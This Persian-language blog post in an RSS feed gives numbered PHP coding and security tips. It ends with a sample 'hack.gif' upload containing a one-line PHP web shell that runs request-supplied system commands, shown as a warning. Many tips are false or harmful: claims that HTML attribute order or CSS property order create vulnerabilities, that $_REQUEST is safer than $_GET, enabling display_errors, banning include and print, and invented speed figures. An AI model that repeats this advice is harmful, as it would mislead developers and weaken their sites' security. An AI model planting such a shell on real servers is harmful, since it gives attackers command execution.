حتی سرعت برخی توابعی که در بسته Standard هستش از توابع موجود در بسته PCRE خیلی بیشتره! نمونش: <strong><span style="color: darkgreen;">سرعت عمل تابع str_replace نسبت به تابع preg_replace، دقیقاً ۲۰% بیشتره</span></strong>(با مثال هم نشون میدم).</p>
<p><strong><span style="color: #808080;">۱۷</span></strong>-  در زبانهای برنامه نویسی استاندارد(به غیر از VB و +A شاید Delphi) وقتی شما دستوری رو می نویسید و اجرا می کنید، حافظه پایان اون دستور رو <strong>; </strong>یا همون<strong> نقطه ویرگول</strong> می دونه و یکی از <strong>ریز دلایلی</strong> که باعث شد استاندارد معرفی بشن همینه.<br />
<strong>عدم رعایتش باعث: کندی در پردازش، آسیب پذیری، سردرگمی در بررسی اولیه صحت دستورات، اشغال فضای حافظه(غیر قابل تخلیه)، بروز خطا(در نرم افزارهای سنگین) و از این قبیل هستش!</strong><br />
مثال صحیح(تکرار):</p>
<div style="margin: 5px 20px 20px;">
<div style="margin-bottom: 2px;">کد PHP:</div>
<div style="border: 1px inset; margin: 0px; padding: 6px; overflow: auto; width: 500px; height: 322px; text-align: left;" dir="ltr"><code style="white-space: nowrap;"><code><span style="color: #000000;"><span style="color: #007700;">if(</span><span style="color: #0000bb;">$_X</span><span style="color: #007700;">)<br />
{<br />
};for(</p>
<p></span><span style="color: #0000bb;">$_X</span><span style="color: #007700;">; …)<br />
{<br />
};if(</p>
<p></span><span style="color: #0000bb;">$_X</span><span style="color: #007700;">): …<br />
endif;for(</p>
<p></span><span style="color: #0000bb;">$_X</span><span style="color: #007700;">; …): …<br />
endfor;class</p>
<p></span><span style="color: #0000bb;">X<br />
</span><span style="color: #007700;">{<br />
};<br />
</span><span style="color: #0000bb;">و<br />
</span><span style="color: #007700;">… </span></span></code></code></div>
</div>
<p><strong> </strong><strong><span style="color: #808080;">۱۸</span></strong>- حتاامکان همه پارامترها، مقادیر، دستورات و غیره… رو تعریف کنید و بحالت پیش فرض رهاش نکنید تا خرابکار(خارج از نرم افزار) سو استفاده و تعریفش نکنه!</p>
<p><strong><span style="color: #808080;">۱۹</span></strong>- <strong><span style="color: deepskyblue;"> </span></strong>اگر بیش از ۳ تابع دارید که در یک زمینه فعالیت می کنن همه رو در یک کلاس قرار بدید. <strong>هم ایمنیش بیشتره(براحتی فراخونی نمیشه)، هم Handling کردنش و هم قدرت پیمایشش</strong>. من خودم قبلاً به دلیل سرعت بیشتر تابع، شاید تا ۵ تابع رو هم کلاس نمی کردم مگر اینه توابع سنگینی بوده باشن. ولی از وقتی از شامپو کلاس استفاده می کنم(ریزش موهام ۲ برابر شده ، خیلی خوبه) کارمم تمیز تر شده <img title="Wink" src="http://forum.majidonline.com/majidonline/smiley_new/majidonline_wink.gif" border="0" alt="" />.</p>
<p><strong><span style="color: #808080;">۲۰</span></strong>-  قبل از استفاده از کلاس، تابع و بسته از وجودش مطلع بشید.  حتماً حتماً!<br />
مثال صحیح:</p>
<div style="margin: 5px 20px 20px;">
<div style="margin-bottom: 2px;">کد PHP:</div>
<div style="border: 1px inset; margin: 0px; padding: 6px; overflow: auto; width: 500px; height: 194px; text-align: left;" dir="ltr"><code style="white-space: nowrap;"> <!-- php buffer start --><code><span style="color: #000000;"> <span style="color: #007700;">if(!</span><span style="color: #0000bb;">extension_loaded</span><span style="color: #007700;">(</span><span style="color: #dd0000;">’standard’</span><span style="color: #007700;">)): @exit(</span><span style="color: #dd0000;">‘Extension Standard not loaded.’</span><span style="color: #007700;">);<br />
elseif(!</span><span style="color: #0000bb;">extension_loaded</span><span style="color: #007700;">(</span><span style="color: #dd0000;">‘mysql’</span><span style="color: #007700;">)): @exit(</span><span style="color: #dd0000;">‘Extension MySQL not loaded.’</span><span style="color: #007700;">);<br />
elseif(!</span><span style="color: #0000bb;">extension_loaded</span><span style="color: #007700;">(</span><span style="color: #dd0000;">‘pcre’</span><span style="color: #007700;">)): @exit(</span><span style="color: #dd0000;">‘Extension PCRE not loaded.’</span><span style="color: #007700;">);<br />
elseif(!</span><span style="color: #0000bb;">extension_loaded</span><span style="color: #007700;">(</span><span style="color: #dd0000;">’session’</span><span style="color: #007700;">)): @exit(</span><span style="color: #dd0000;">‘Extension Session not loaded.’</span><span style="color: #007700;">);<br />
elseif(!</span><span style="color: #0000bb;">class_exists</span><span style="color: #007700;">(</span><span style="color: #dd0000;">‘Tehran’</span><span style="color: #007700;">)): @exit(</span><span style="color: #dd0000;">‘Class Tehran does not exist.’</span><span style="color: #007700;">);<br />
endif;<br />
</span><span style="color: #0000bb;">و</span><span style="color: #007700;">…<br />
if(</span><span style="color: #0000bb;">function_exists</span><span style="color: #007700;">(</span><span style="color: #dd0000;">’settype’</span><span style="color: #007700;">)): </span><span style="color: #0000bb;">settype</span><span style="color: #007700;">(</span><span style="color: #0000bb;">$Str_Input</span><span style="color: #007700;">, </span><span style="color: #dd0000;">’string’</span><span style="color: #007700;">);<br />
else: (string)</span><span style="color: #0000bb;">$Str_Input</span><span style="color: #007700;">;<br />
endif;<br />
</span><span style="color: #0000bb;">و</span><span style="color: #007700;">…<br />
</span> </span> </code><!-- php buffer end --> </code></div>
</div>
<p><strong><span style="color: #808080;">۲۱</span></strong>- <strong><span style="color: deepskyblue;"> </span></strong>الفبای کد نویسی ایستا!<br />
بین(صحیح):</p>
<div style="margin: 5px 20px 20px;">
<div style="margin-bottom: 2px;">کد:</div>
<pre style="border: 1px inset; margin: 0px; padding: 6px; overflow: auto; width: 500px; height: 34px; text-align: left;" dir="ltr">&lt;input name="InpTxt_Username" type="text" value="" maxlength="15" size="15" id="InpTxt_Username"&gt;</pre>
</div>
<p>و(غلط):</p>
<div style="margin: 5px 20px 20px;">
<div style="margin-bottom: 2px;">کد:</div>
<pre style="border: 1px inset; margin: 0px; padding: 6px; overflow: auto; width: 500px; height: 34px; text-align: left;" dir="ltr">&lt;input type="text" name="InpTxt_Username" id="InpTxt_Username"&gt;</pre>
</div>
<p>خیلی تفاوت و جای سو، استفاده هست!<br />
حتی بین پارامترهای CSS(غلط):</p>
<div dir="ltr">overflow: hidden; width: 250px; height: auto;</div>
<p>و(صحیح):</p>
<div dir="ltr">width: 250px; height: auto; overflow: hidden;</div>
<p>همچنین بین(صحیح):</p>
<div dir="ltr">$_REQUEST['FormName'], $_REQUEST['SubmitButtonName']…</div>
<p>و(غلط):</p>
<div dir="ltr">$_GET['FormName'], $_GET['SubmitButtonName']…</div>
<p><strong><span style="color: red;">خیلی تفاوت و جای سو استفاده هست!</span></strong><br />
پس در نوشتن اینها(حتی اگر خودکار Insert می شوند) دقت کنید!</p>
<p><strong><span style="color: #808080;">۲۲</span></strong>-  از متد Protected/Public/Private به جای متد <strong><span style="color: red;">Var</span></strong> استفاده کنید. متد Var که معادل Public در PHP 5 هستش منسوخ شده و سطح ایمنی بسیار پایینی برای محافظت متغیر های داخلی داره. پس حتاًالمکان از این متد استفاده نکنید.<br />
شاید هم در نگارش های بعدی PHP(به غیر از Alpha و Beta) بکلی حذف شود! انشاا…</p>
<p><strong><span style="color: #808080;">۲۳</span></strong>- <strong><span style="color: deepskyblue;"> </span></strong>حتاامکان از دستورات ::Self و ::Parent در کلاس والد برای دستیابی به اعضا و غیره…، به جای ::ClassName استفاده کنید. در عمل و ظاهر تفاوتی ندارند ولی در باطن(حافظه) خیلی فرق دارند(پشمایش کلی انجام میده).</p>
<p><strong><span style="color: #808080;">۲۴</span></strong>-  <strong><span style="color: red;"><span style="font-size: small;">آسیب پذیری مشترک و همگانی!</span></span></strong><br />
ورودی و خروجی پارامترهای URL رو <strong>چک و فیلتر </strong>کنید. مطمعن شوید که مثلاً</p>
<div dir="ltr"><strong>/index.php?Module=News&amp;Action=Show&amp;Identity=1&amp;Valid =True…</strong></div>
<p>، در اینجا Module از نوع حروف(Alphabetic) به طول ۲۵۵ کاراکتر، و Action هم از نوع حروف(Alphabetic) با طول ۲۵۵ کاراکتر و Identity از نوع عدد(Integer) با طول ۱۰، و Valid از نوع Boolean هستش! <strong>این نکته ساده رو اغلب رعایت نمی کنن و بارها بارها بارها آسیب های جدی در نرم افزار هایشون بصورت مکرر پیش میاد.</strong><br />
<span style="color: darkred;"><span style="font-size: xx-small;">همین الان در همین تالار خیلی ها وبسایتهایی دارند که از این نقطه آسیب پذیرند!!</span></span></p>
<p><strong><span style="color: #808080;">۲۵</span></strong>- <strong><span style="color: deepskyblue;"> </span></strong>خروجی ها رو به نوع مربوطش <strong>حتماً حتماً حتماً </strong>تبدیل کنید.<br />
مثلاً:</p>
<div dir="ltr">return((array)$_Ary_Output);</div>
<p>،</p>
<div dir="ltr">return((string)$_Str_Output);</div>
<p>…<br />
اگر هم نرم افزارتون قابلیت تغییر Template/Theme رو داره، <strong>در آخر خروجی</strong> HTML یا همون Echo، از دستور<br />
<strong> </strong></p>
<div dir="ltr"><strong>@exti(”);</strong></div>
<p><strong> </strong> جهت پاکسازی نهایی(آخر) بعد از خودش استفاده بکنید.<br />
<strong><span style="color: seagreen;">دسترسی فایلها تون رو هم به ReadOnly تنظیم کنید. حتی index.html ها در پوشه های خالی!</span></strong></p>
<p><strong><span style="color: #808080;">۲۶</span></strong>-  اگر از short_open_tag مثل &lt;؟ ؟&gt; استفاده می کنید از فعال(On) بودن این Option در راس نرم افزارتون مطمعن بشید:</p>
<div dir="ltr">@ini_set(’short_open_tag’, ‘on’);</div>
<p><span style="font-size: xx-small;">این Option در تعداد بیشماری از Server ها، بصورت Off هستش!</span></p>
<p><strong><span style="color: #808080;">۲۷</span></strong>- <strong><span style="color: deepskyblue;"> </span></strong>حتاامکان از بسته PEAR :: Db استفاده نکنید!<br />
این بسته <strong>۲ مزایا داره که == ۲ معایبش</strong>… چون PEAR :: Db با PHP بکار گرفته میشه،<br />
<strong>پس ۱: </strong>لایه ای که در PHP نوشته می شود از توابع داخلی خود PHP کند تر هست! مخصوصاً اگر بدون کش opcode اجرا شود. که اغلب می شود. نمی دونم چطوری، ولی فکر کنم با دعا جادو!<br />
<strong>پس ۲: </strong>لایه اضافی کد، پیچیدگی و احتمال خطا را افزایش میده و در نتیجه آسیب پذیر میشه.<br />
<strong>من، برای خودم </strong>هیچ کدوم از بسته های PEAR رو قبول ندارم. مخصوصاً بسته های Filtration Validation Db. پیشنهاد می کنم شما هم نداشته باشید.</p>
<p><strong><span style="color: #808080;">۲۸</span></strong>-<strong> </strong>حملات <strong>DOS</strong>!<br />
ساده ترین و عامیانه ترین عواملی که باعث میشن: <strong>پهنای باند پایین</strong>، <strong>پیکربندی نامناسب سرور وب</strong> و استفاده از <strong>نرم افزار های سنگین</strong>(نیوک ها، تالار/انجمن ها…)(برای کار های سبک) و <strong>غیر استاندارد</strong> هستش!<br />
راه حل ها(در مورد همه زبانهای تحت وب صدق میکنه): پهنای باند حداقل ۵۰۰ مگابایت، محدود کردن حجم هر بسته(HTTP post) نسبت به پهنای باند، محدود کردن حجم هر درخواست(Body request) نسبت به پهنای باند، محدود کردن حجم Upload فایل نسبت به پهنای باند، استفاده از فشرده سازی محتوا(Output)/Cache، محدود کردن زمان Excute نرم افزار(مثلاً ۲۵ ثانیه)، بهینه سازی/استاندارد سازی محتوای Client-side، انتقال ندادن خطاهای HTTP به صفحات اصلی(در غیر این صورت یک Referer خطرناک هم خواهید داشت)، استفاده از فرمت های مناسب(JPG, JPEG, JPE…) تصاویر، Handing کردن Repetition/Duplication ها، <strong>محدود کردن ترافیک خارجی با استفاده از IP range</strong> و…<br />
محدود کردن ترافیک با استفاده از IP range: در وبسایتهای داخلی، طبیعتاً نیازی به ترافیک کشورهای خارجی نیست(اعم از Spam/Bot/Visitor…)! با Block کردن range های IP کشورهای خارجی،<strong> پهنای باند و امنیت بیشتر </strong>رو برای وبسایت و سرور تون مهیا کنید. مثل <strong>روسیه،</strong> عربستان، افغانستان، ترکیه و…</p>
<p><strong><span style="color: #808080;">۲۹</span></strong>- پروتکل WAP<br />
25% برنامه نویسان با این پروتکل آشنایی ندارند! ۵۰% آشنایی دارند ولی اهمیتی نمیدن! ۲۵% می شناسن و اهمیت میدن…<br />
تنها چیزی که میشه گفت: این پروتکل همون قدر مفید و قدرتمند هستش/همون قدر هم خطرناک!<br />
فقط چند پیشنهاد: یا کلاً اجازه ورود رو بهش ندید(ارزشش رو داره) یا تماماً Header رو پاکسازی کنید(کمی سخته) یا فقط دسترسی Browse بهش بدید(کار کشته میطلبه).</p>
<p><strong><span style="color: #808080;">۳۰</span></strong>- برای جلوگیری از ورود <strong>کاراکترهای مخرب</strong> UTF/Unicode به جداول Latin، از Option زیر برای ساختن جدول استفاده کنید(در مورد همه Database ها صدق میکنه):</p>
<div dir="ltr">charset= utf8</div>
<p><strong><span style="color: #808080;">31</span></strong>- از قرار دادن <strong>فضا های خالی بی مورد و Comment های بیجا و نامناسب</strong> خودداری کنید. اینها تقریباً ۱۵% از حجم کل نرم افزارتون رو میگیرند!(Web programming میکنید نه Desktop programming).</p>
<p><strong><span style="color: #808080;">32</span></strong>- حتالمکان توابع رو در کلاس بصورت <strong>static</strong> تعریف کنید، چراکه سرعت پردازش/Compile رو بسیار افزایش میده(مخصوصاً توابع طولانی و سنگین).</p>
<p><strong><span style="color: #808080;">۳۳</span></strong>- به هیچ وجه از دستور print استفاده نکنید(++۹۹۹۹E+ بار گفته شده). دلیلتون برای استفاده چیه؟!</p>
<p><strong><span style="color: #808080;">۳۴</span></strong>- در هنگام نصب جداول از بودن یا نبودنش مطلع بشید تا هنگام نصب/پیکربندی با خطا مواجه نشین. مثلاً:</p>
<div dir="ltr">drop table if exists `xxxxx`;<br />
create table if not exists `xxxxx`;</div>
<p><strong><span style="color: #808080;">35</span></strong>- حتاالمکان برای Database تون Password تعیین کنید.<br />
اغلب Database ها بصورت پیش فرض Password هایی برای مدیر دارند، که خرابکار با بدست آوردن Username براحتی وارد Database خواهد شد و…!!<br />
پس برای Database تون Password تعیین کنید.</p>
<p><strong><span style="color: #808080;">۳۶</span></strong>- تنضیمات PHP:<br />
register_globals رو Off قرار بدید(++۹۹۹۹E+ بار گفته شده).<br />
session.auto_start رو ۰ قرار بدید.<br />
default_mimetype رو text/html قرار بدید(سرعت بیشتر).<br />
display_errors رو ۱ قرار بدید.<br />
بهتره log_errors رو Off قرار بدید.<br />
بهتره DATABASE.allow_persistent رو Off قرار بدید.<br />
بهتره DATABASE.max_persistent رو ۱- قرار بدید.<br />
حتاامکان DATABASE.default_user و DATABASE.default_password رو خالی بزارید.<br />
حتاامکان session.hash_function رو ۱ قرار بدید(SHA1).<br />
session.hash_bits_per_character رو ۵ قرار بدید.<br />
در حالت معمولی دلیلی ندارید که safe_mode رو On قرار بدید.</p>
<p><strong><span style="color: #808080;">۳۷</span></strong>- یک فایل htaccess درست کنید(برای نرم افزارتون) و تنظیمات زیر رو درونش قرار بدید(در حالت عادی):</p>
<div style="margin: 5px 20px 20px;">
<div style="margin-bottom: 2px;">کد:</div>
<pre style="border: 1px inset; margin: 0px; padding: 6px; overflow: auto; width: 500px; height: 338px; text-align: left;" dir="ltr">&lt;Files .htaccess&gt;order allow,denydeny from all&lt;/Files&gt;

Options All -Indexes -ExecCGI -MultiViews

DirectoryIndex index.php index.html

AddDefaultCharset utf-8

&lt;FilesMatch "\.(php|phphtml|html|xml)$"&gt;Header unset cache-control&lt;/FilesMatch&gt;

&lt;IfModule sapi_apache2.c&gt;php_value register_globals 0php_value session.auto_start 0&lt;/IfModule&gt;</pre>
</div>
<p>(این فایل رو در پوشه(Folder) اصلی نرم افزار قرار بدید.)</p>
<p><strong><span style="color: #808080;">۳۸</span></strong>- <strong>محتویات</strong> تمام فایلهای Index.html یا Index.php یا Index.* <strong>در پوشه های خالی</strong> رو پاک کنید و فایل رو خالی از هر چیزی کنید…<br />
<strong>حداقل</strong> اگر ۲۰ پوشه داشته باشید در هر ۲۰ پوشه ۵ پوشه دیگر و… و در هر فایل Index <strong>حداقل</strong> ۵۰ کیلوبایت اطلاعات، ببینید چه حجم زیادی از نرم افزار رو میگیرن؟!(Web programming میکنید نه Desktop programming)</p>
<p><strong><span style="color: #808080;">39</span></strong>- اگر نرم افزارتون قابلیت Multi language/چند زبانه رو داره، هیچ وقت یک فایل رو مختص تمام این کار قرار <strong>ندید</strong> و در همه جا همون رو فراخوانی <strong>نکنید</strong>(خیلی از نرم افزارهای معروف و مثلاً استاندارد اینکارو میکنن)! در صورتی که نیمی از متغیرها بی استفاده تعریف و Load میشن!! و دیگه Unload/Unset هم نمیشن!!<br />
باید مثلاً <strong>۱ پوشه به نام زبان درست کنید </strong>و <strong>درونش بخش بخش فایل های Language رو قرار بدید.</strong> مثلاً ,menu.php ,events.php ,global.php index.php ,login.php,…</p>
<p><strong><span style="color: #808080;">۴۰</span></strong>- هیچ وقت از آرایه/متغیر سراسری <strong>GLOBALS$/global</strong> استفاده نکنید. این دستور به صورت Scope تعریف و ارجاع می شه! و<strong> ایمنی خیلی پایینی</strong> هم داره. همچنین <strong>از ()UnSet هم پشتیبانی نمی کنه</strong>(تجسم خلاق کنیم حذفش کنن…).</p>
<p><strong><span style="color: #808080;">۴۱</span></strong>-<strong> </strong>بهتره هیچ وقت از include و include_once استفاده نکنید! دلیلتون برای استفاده چیه؟!</p>
<p><strong><span style="color: #808080;">۴۲</span></strong>-<strong> </strong>حتاالمکان آدرس کامل(Path) رو برای ضمیمه هر فایلی بنویسید. این کار سرعت پیدا/Solve کردن Path رو توسط سرور افزایش میده(Steelsheet ها، JavaScript ها، require ها و…).</p>
<p><strong><span style="color: #808080;">۴۳</span></strong>-<strong> </strong>بعد از نصب/پیکربندی نرم افزار، حتماً حتماً پوشه/فایل Install رو حذف کنید!</p>
<p><strong><span style="color: #808080;">۴۴</span></strong>-<strong> </strong>حتاامکان از دستور switch بجای چند شرطی if استفاده کنید. اینکار سرعت پردازش/Compile رو افزایش میده.</p>
<p><strong><span style="color: #808080;">۴۵</span></strong>- حتالمکان از @ برای ignore کردن خطا(Error suppression) در <strong>توابع/دستورات</strong> طولانی/سنگین/پر کاربرد استفاده نکنید! این کار سرعت سرور وب رو برای پردازش/Compile<strong> خیلی کاهش میده</strong>!!</p>
<p><strong><span style="color: #808080;">۴۶</span></strong>- متغیر ها، آرایه ها، درخواستهای HTTP و… رو  بعد از استفاده <strong>حتماً حتماً</strong> Unset/خنثی کنید!</p>
<p><strong><span style="color: #808080;">۴۷</span></strong>- کدها/اسکریپتهای کوتاه رو در فایل HTML قرار بدید. این کار سرعت سرور وب رو برای پردازش/Compile خیلی افزایش میده.</p>
<p><strong><span style="color: #808080;">۴۸</span></strong>-<strong> </strong>بعد استفاده از session حتماً حتماً اون رو <strong>destroy</strong> و <strong>unset</strong> کنید!!<br />
session_unset و session_destroy<br />
<strong>اغلب PHP نویسان به session_destroy کفایت میکنن!!</strong> در صورتی که unset یه چیزه destroy چیزه دیگست…</p>
<p>و آخر اینکه مواظب تصاویری که <strong>Upload</strong> میشن باشید!!<br />
این مساله بیشتر در مورد فرم های ثبت نام!!، فرم های استخدام!! گالری های تصاویر!! و امثالش صدق میکنه.<br />
باید مطمعن بشید که فایل Upload شده تصویری هستش! در غیر این صورت با همچین چیزی مواجه میشید:<br />
مثال ساده محتوای فایل hack.gif</p>
<div style="margin: 5px 20px 20px;">
<div style="margin-bottom: 2px;">کد:</div>
<pre style="border: 1px inset; margin: 0px; padding: 6px; overflow: auto; width: 500px; height: 114px; text-align: left;" dir="ltr">&lt;?php@system($_REQUEST['Command']);?&gt;&lt;?phpworm, cookiestealer...?&gt;</pre>
</div>
<p>…<br />
برای جلوگیری از اینکار سایز/اندازه/پیکسل تصویر رو بگیرید… اگر فاقد اینها بود فایل تصویری نیست.<br />
امیدوارم این مطلب بسیار کاربردی و مهم مورد استفاده شما قرار بگیرید، انشاء الله آرایه قلبتون null نباشه length  اش هیچ وقت هم صفر نباشه<br />
پ.ن : اگه اصلا نمی فهمید این چیزهایی که نوشته شده چه معنی می دهد، پس در نتیجه این مطلب برای شما نوشته نشده است.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.iflashlord.com/1387/12/%d9%86%da%a9%d8%a7%d8%aa-%d8%a7%d8%b5%d9%88%d9%84-%d9%85%d9%87%d9%85-%d8%a8%d8%b1%d9%86%d8%a7%d9%85%d9%87-%d9%86%d9%88%db%8c%d8%b3%db%8c/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
	</channel>
</rss>
